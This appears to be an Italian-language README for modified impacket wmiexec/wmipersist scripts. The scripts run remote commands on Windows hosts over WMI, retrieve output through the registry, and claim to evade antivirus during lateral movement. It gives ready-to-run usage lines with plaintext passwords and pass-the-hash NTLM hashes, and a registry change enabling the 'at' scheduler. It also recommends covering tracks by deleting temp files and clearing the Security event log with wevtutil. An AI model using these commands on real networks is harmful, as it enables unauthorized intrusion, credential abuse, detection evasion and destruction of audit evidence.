
Versione modificata di impacket wmiexec.py, ottieni output(data,response) dal registro, non necessita di connessione SMB, inoltre bypassa il software antivirus nel movimento laterale come WMIHACKER.
Versione modificata di impacket wmiexec.py, wmipersist.py. Ottiene l'output (dati, risposta) dal registro, non necessita di connessione SMB, ma il codice è brutto :(
Nel wmiexec.py originale, ottiene la risposta dalla connessione SMB (porta 445, 139). Sfortunatamente, alcuni software antivirus monitorano queste porte come ad alto rischio.
In questo caso, ho eliminato la funzione di connessione SMB e ho utilizzato altri metodi per eseguire comandi.
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration
Name: EnableAt
Type: REG_DWORD
Value: 1
wmipersist-wip.py (Altamente raccomandato, !!!funziona solo su impacket v0.9.24!!!): Una versione Python di WMIHACKER, da cui ho preso il template VBS. L'attaccante può usarlo per fare movimento laterale in sicurezza sotto l'esecuzione di software antivirus.
wmiexec-regOut.py: Solo un semplice esempio del metodo Win32_Process.create.
Step 1:
Step 2:
Step 3:
Step 4:
Step 5:
Step 1:
Step 2:
Step 3:
Generalmente, è sufficiente installare impacket ufficiale.
Con password in chiaro
python3 wmiexec-reg.py administrator:[email protected] 'whoami'

Con hash NTLM
python3 wmiexec-reg.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'

Con password in chiaro (senza output)
python3 wmipersist-wip.py administrator:[email protected] 'command'

Con hash NTLM
python3 wmipersist-wip.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'
Non dimenticare di pulire la directory temp dopo aver eseguito il comando con output.
Comando: del /q /f /s C:\windows\temp\*

Comando include virgolette doppie.
Metti le virgolette doppie all'interno di virgolette singole wevtutil cl '"security"'


Con output
python3 wmipersist-wip.py administrator:[email protected] "whoami /priv" -with-output
python3 wmipersist-wip.py [email protected] "whoami /priv" -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 -with-output

Sotto software antivirus Huorong (usando il template VBS di WMIHACKER!!!)
